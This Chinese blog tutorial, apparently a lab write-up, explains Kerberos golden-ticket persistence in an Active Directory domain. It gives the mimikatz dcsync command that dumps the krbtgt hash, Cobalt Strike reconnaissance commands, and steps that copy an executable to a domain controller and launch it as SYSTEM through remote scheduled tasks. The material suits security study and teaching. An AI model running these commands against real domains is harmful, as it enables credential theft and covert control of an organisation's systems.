首页 > 其他分享 >黄金票据权限维持

黄金票据权限维持

时间:2023-06-19 14:25:12浏览次数:44  
标签:shell krbtgt NTLM dc candada 票据 权限 com 黄金

黄金票据权限维持

目录

一、Krbtgt账户介绍

krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机。

二、黄金票据原理

TGT=Krbtgt的NTLM哈希加密

1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的,TGT它是由Krbtgt加密和签名的,krbtgt的 NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。

2、所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key(CT_SK)。

3、Client与TGS的交互中,而已有了黄金票据后(TGT),就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。

三、实验前提

已经控制了域名并且使用域管理员登录或者提权的system。

条件如下:

1、域名称
2、域的SID值
3、域的krbtgt账号的NTLM哈希
4、伪造任意用户名(这个可以随意)

四、实验步骤

1、获取关键信息

shell whoami /user 获取域名和SID
shell net config workstation 获取完整域名
shell wmic useraccount list brief 获取域名和SID
shell net time /domain 获取域主机名

2、使用mimikatz导出krbtgt的NTLM哈希

mimikatz lsadump::dcsync /domain:candada.com /user:krbtgt

3、拿到这些信息可以利用CS做黄金票据

4、做完后可以利用dir远程访问域控

shell dir \\dc.candada.com\c$

5、使用计划任务上线cs

(1)远程复制文件

shell copy c:\users\administrator\desktop\can.exe \\dc.candada.com\c$

(2)设置计划任务到域控

shell schtasks /create /s dc.candada.com /tn test /sc onstart /tr c:\can.exe /ru system /f

(3)启动计划任务

shell schtasks /run /s dc.candada.com /i /tn "test"

(4)删除计划任务

shell schtasks /delete /s dc.candada.com /tn "test" /f

标签:shell,krbtgt,NTLM,dc,candada,票据,权限,com,黄金
From: https://www.cnblogs.com/candada/p/17491023.html

相关文章

  • 白银票据权限维持
    白银票据权限维持目录白银票据权限维持一、服务账号介绍二、白银票据原理三、实验前提四、实验步骤一、服务账号介绍服务账号就是计算机名字+$用来管理服务的账号二、白银票据原理如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。在Kerberos认证的第5步,Client带着ST和A......
  • 一个用户创建引发的权限控制问题
    昨天开发同学提了一个需求,比较有意思。需求描述:要求开发库创建一个新用户A(默认表空间TBS_1),由于这库是共享库,还有其他schema(示例:表空间TBS_2)被其他组的开发人员使用,需要避免使用A用户的开发人员,利用createtablet(colname)tablespacetbs_2通过指定表空间的方式在tbs_2上创建......
  • Pixel 2XL线刷-获取Root权限
    转载于:https://www.cnblogs.com/liuqingzheng/p/17462127.html一什么是线刷,什么是卡刷#线刷(通过连接计算机进行刷机):factory完整包,可以降级线刷是指使用计算机通过USB连接将刷机文件传输到设备上,并通过命令行工具(如ADB和Fastboot)执行刷机操作的方式。在线刷过程中,设备进入Fas......
  • Pixel2XL解锁BL-刷入Twrp-获取Root权限
    转载于:https://www.cnblogs.com/liuqingzheng/p/17462146.html 前提:手机账号退出,不插卡,不联网,删除pin指纹以及开机密码一解锁BL(如已解锁,该步骤不需要)1.1bootloader是什么?bootloader,中文翻译为启动引导程序。打个比方来说,当我们启动手机的时候,最先开始执行的就是这段程......
  • RBAC实战-配置用户操作集群权限(二)
    生成私钥cd/etc/kubernetes/pki(umask077;opensslgenrsa-outlucky.key2048)生成证书请求opensslreq-new-keylucky.key-outlucky.csr-subj"/CN=lucky"生成luckyca证书,获取APIServer信任opensslx509-req-inlucky.csr-CAca.crt-CAkeyca.key-CAcreatese......
  • Oracel 创建表空间、创建用户并设置密码及制定表空间、分配权限、创建角色、角色授权
    select*fromdba_data_files;select*fromdba_users;--删除用户--DROPUSERSYNC_PLUS_1cascade;--删除表空间--droptablespaceSYNC_PLUS_ORCLPDB1includingcontentsanddatafiles;/*createtablespacesync_plus_1datafile'F:\DB_FILES\ORAC......
  • Windows提权到system权限
    提权到ntauthority\system权限:1.在PowerShell下运行p.ps1脚本2.运行如下命令:[MyProcess]::CreateProcessFromParent(1580,"c:\windows\system32\cmd.exe","")3.在新打开的窗口中运行whoami,可以看到当前账户为ntauthority\system4.然后可以重启schedule服务scstopschedule&......
  • 刘铭诚:6.16黄金价格暴跌虚晃一枪!WTI原油行情分析操作建议
    黄金行情走势分析——昨夜公布的美国5月零售销售和制造业指数均好于预期,但初请失业金人数和续请失业金人数分别上升26.2万人和177.5万人,继续呈现出上升趋势,但是市场好像更加关心就业问题,数据公布后美债收益率下跌,美元指数也大幅下挫,这也让金价喘口气,在跌破1932之后,又快......
  • Pixel2XL解锁BL-刷入Twrp-获取Root权限
    Pixel2XL解锁BL-刷入Twrp-获取Root权限前提:手机账号退出,不插卡,不联网,删除pin指纹以及开机密码【一】解锁BL(如已解锁,该步骤不需要)(1)bootloader是什么?bootloader中文翻译为启动引导程序。打个比方来说,当我们启动手机的时候,最先开始执行的就是这段程序,然后对手机进行一些......
  • Pixel 2XL线刷-获取Root权限
    Pixel2XL线刷-获取Root权限【一】什么是线刷,什么是卡刷(1)什么是线刷线刷(通过连接计算机进行刷机):factory完整包,可以降级线刷是指使用计算机通过USB连接将刷机文件传输到设备上,并通过命令行工具(如ADB和Fastboot)执行刷机操作的方式。在线刷过程中,设备进入Fastboot模式,通过F......